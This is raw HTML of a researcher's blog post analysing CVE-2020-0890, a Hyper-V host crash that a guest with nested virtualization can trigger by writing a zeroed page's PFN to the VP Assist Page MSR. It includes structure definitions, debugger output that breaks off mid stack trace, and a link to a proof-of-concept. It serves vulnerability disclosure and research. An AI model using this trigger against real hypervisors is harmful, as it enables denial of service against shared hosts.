face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-scripts</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Scripts, testing on IDA PRO 7.5, loaded in ida75 subfolder.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Radare2 build for Hyper-V debugging placed:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;"><a href="https://yadi.sk/d/eDAD9gIMEcAYEg" style="text-decoration: none;">https://yadi.sk/d/eDAD9gIMEcAYEg</a></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span style="font-size: 9pt; text-indent: 35.4pt;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span style="font-size: 9pt; text-indent: 35.4pt;">Hyper-V guest driver source:</span></p><p class="MsoNormal" style="margin-bottom: 0cm; text-align: justify; text-indent: 35.4pt;"><a href="https://github.com/gerhart01/Hyper-V-Internals/tree/master/hyperv2019" style="font-size: 9pt; text-indent: 35.4pt;">https://github.com/gerhart01/Hyper-V-Internals/tree/master/hyperv2019</a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></p></span>Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-10587004800006045102020-09-03T09:29:00.004-07:002020-10-22T01:18:09.491-07:00Windows Hyper-V Denial of Service Vulnerability in nested virtualization component (CVE-2020-0890)<span id="docs-internal-guid-922d493f-7fff-267f-27ef-daaba9b8be1f"><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><br /></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Vulnerability is triggered from guest OS with nested virtualization option enabled. Tested on Windows Server 2019 August 2020 updates, Windows 10 20H1 August 2020 updates, and Windows 10 21H1 Preview (builds 20206.1000 and early).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Bug is also presented in original version of Windows Server 2019 without patches (November 2018).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PoC source on Github: </span><a href="https://github.com/gerhart01/hyperv_local_dos_poc" style="text-decoration: none;"><span face="" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/gerhart01/hyperv_local_dos_poc</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Software:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Windows Server 2019 in host OS;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Windows Server 2019 in guest OS;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WinDBG preview</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IDA PRO freeware</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hyper-V nested virtualization for Intel CPU was introduced in Windows Server 2016 and Windows 10 Anniversary update (2016 year): </span><a href="https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/nested-virtualization%D1%8E" style="text-decoration: none;"><span face="" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/nested-virtualization</span></a><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. It can be used for launching hypervisor inside guest OS (or some features like Windows Sandbox, MDAG inside Hyper-V VM).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Technically mistake of Hyper-V coder is very simple – they didn’t filter parameters of VP Assist Page, which address is written to Virtual VP Assist MSR (0x40000073). Early msr register 0x40000073 have name </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_APIC_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, now (in TLFS 6.0) - </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> msr structure:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="53" src="https://lh6.googleusercontent.com/7xvG_W4dEmw5M4Jux0CcbKJkil2ZLcBsCbMGH-ynUHXRV6OcPC8ZvZDqJWTYW9f68WdnneXOU4rhRS5igqB2c5l7rh562zy6ehr5xjSota-MH2UgTOK9exl6oCVaZ_FO20DUnB2F-6O_bI_Fcg" style="margin-left: 0px; margin-top: 0px;" width="406" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">typedef union _VIRTUAL_VP_ASSIST_PAGE_PFN</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">{</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT64 AsUINT64;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> struct</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> {</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT64 Enable : 1;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT64 Reserved : 11;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT64 PFN : 52;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> };</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">} VIRTUAL_VP_ASSIST_PAGE_PFN, * PVIRTUAL_VP_ASSIST_PAGE_PFN;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">According Hyper-V TLFS 6.0 VP Assist Page is overlay page. GPA address of that page is written to PFN field:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">typedef union _HV_VP_ASSIST_PAGE</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">{</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> struct</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> {</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> // APIC assist for optimized EOI processing.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> HV_VIRTUAL_APIC_ASSIST ApicAssist;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT32 ReservedZ0;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> // VP-VTL control information</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> HV_VP_VTL_CONTROL VtlControl;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> HV_NESTED_ENLIGHTENMENTS_CONTROL NestedEnlightenmentsControl;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> BOOLEAN EnlightenVmEntry;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT8 ReservedZ1[7];</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> HV_GPA CurrentNestedVmcs;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> BOOLEAN SyntheticTimeUnhaltedTimerExpired;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT8 ReservedZ2[7];</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> // VirtualizationFaultInformation must be 16 byte aligned.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> //</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> HV_VIRTUALIZATION_FAULT_INFORMATION VirtualizationFaultInformation;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> };</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT8 ReservedZBytePadding[HV_PAGE_SIZE];</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">} HV_VP_ASSIST_PAGE, * PHV_VP_ASSIST_PAGE;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If we write PFN of zeroed page to </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> msr, we get BSOD.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img alt="Изображение" height="331" src="https://lh3.googleusercontent.com/tEkerKYATvVo0uoUA7cCGGAJtgnci1Ns82tzuKYxmqEgNjhbNyJ__sxOyivePMGX3CNFKYUHp09yxJlPlPUCMcOm0CwB0v27E1HK_dXWrvttl-U9HlBpASwwyoVOn8hff9dvsRFUZqdNYWbQJQ" style="margin-left: 0px; margin-top: 0px;" width="442" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Windows 10 immediately reboots, even if automatic reboot option is disabled. If we connect debugger to hvix64.exe (Windows Server 2019, 08.2020 updates, hvix64.exe, build 10.0.17763.1397) we get:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hv+0x28af50:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">fffff982`efc8af50 cc int 3</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1: kd> g</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Access violation - code c0000005 (!!! second chance !!!)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hv+0x27747e:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">fffff982`efc7747e 384249 cmp byte ptr [rdx+49h],al</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2: kd> k</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> # Child-SP RetAddr Call Site</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">00 00000100`00803d08 fffff982`efc75e1b hv+0x27747e</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">01 00000100`00803d10 fffff982`efcfd74f hv+0x275e1b</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: 